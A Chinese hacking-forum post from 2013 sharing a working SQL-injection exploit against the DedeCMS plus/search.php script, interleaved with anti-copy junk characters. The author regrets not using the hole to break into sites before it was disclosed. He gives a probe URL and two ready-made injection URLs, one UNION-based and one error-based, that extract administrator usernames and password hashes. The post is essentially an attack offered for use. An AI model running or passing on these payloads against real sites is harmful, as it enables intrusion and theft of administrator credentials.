找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1954|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ
& X! D5 ~: _+ O" M$ \9 a# |8 V) r0 @- j
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。0 N; r8 O3 u+ Y! G# N- d$ v# S
' M+ ~0 ^3 |, F5 a; B
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
! [0 L3 ]2 X9 T% I! R" b  Z3 A- q& z1 L5 k# ^5 R+ _# U
我一般是这样测试的:
- B8 w$ A, W6 ?+ l1 v. Q3 a3 g/ D" U$ n
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
6 G! j: S$ }7 Y3 X! _8 S0 m  u! Q- l6 Q( F. L
转载不加作者名的没JJ( O8 ]5 f% M+ G" P6 e; p

) |$ [: D  @% c) A  W% q作者:鬼哥
* Q5 s  i  \" ]$ E. J$ _& I) y' ~
( s3 R2 |8 T& ]6 D9 B, \1 t# z1 q, f
3 ~; t8 M2 H' d  F  c" \8 @2 h! ]5 j: F; z1 R
看结果如果提示
; ^+ q# S( [5 k  \* `( A" p
; h+ ~1 J2 r2 m+ z+ WSafe Alert: Request Error step 2 !
& Q* `" K" k0 r# h' k. i
7 n$ g3 [* ]6 \: D2 F4 [9 d那么直接用下面的exp
6 P/ @2 e! U% b8 F: Y: f
% h  n* y" h4 }- v9 b" ^xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
- c' m- M/ D/ V, L5 G8 C
& ~, S. O8 `( L9 Q/ B4 t' |
9 a) b9 a5 t( `: V. j9 d) ^% q5 }看结果如果提示( Z- Z- z4 L+ v; b5 N- T

+ e" p( [, J3 [8 X5 {" A! ?, k& aSafe Alert: Request Error step 1 !+ J- Y& y5 A5 F# Z( P7 {
( p, R1 f5 a$ \# f0 J
那么直接用下面的exp
1 q) y' r$ Q* T: Q: g: B! J( d, p" [2 S& q! Z; o
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
6 F( d' O3 i- s6 P& B! b
2 ]7 i1 _" O2 {  Y: v" U/ z  X, `  ^
如果正常显示证明漏洞不存在了。+ l7 z& Y, K8 ?) Y/ |
/ `. ?& X# g! a3 F. n. C
转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表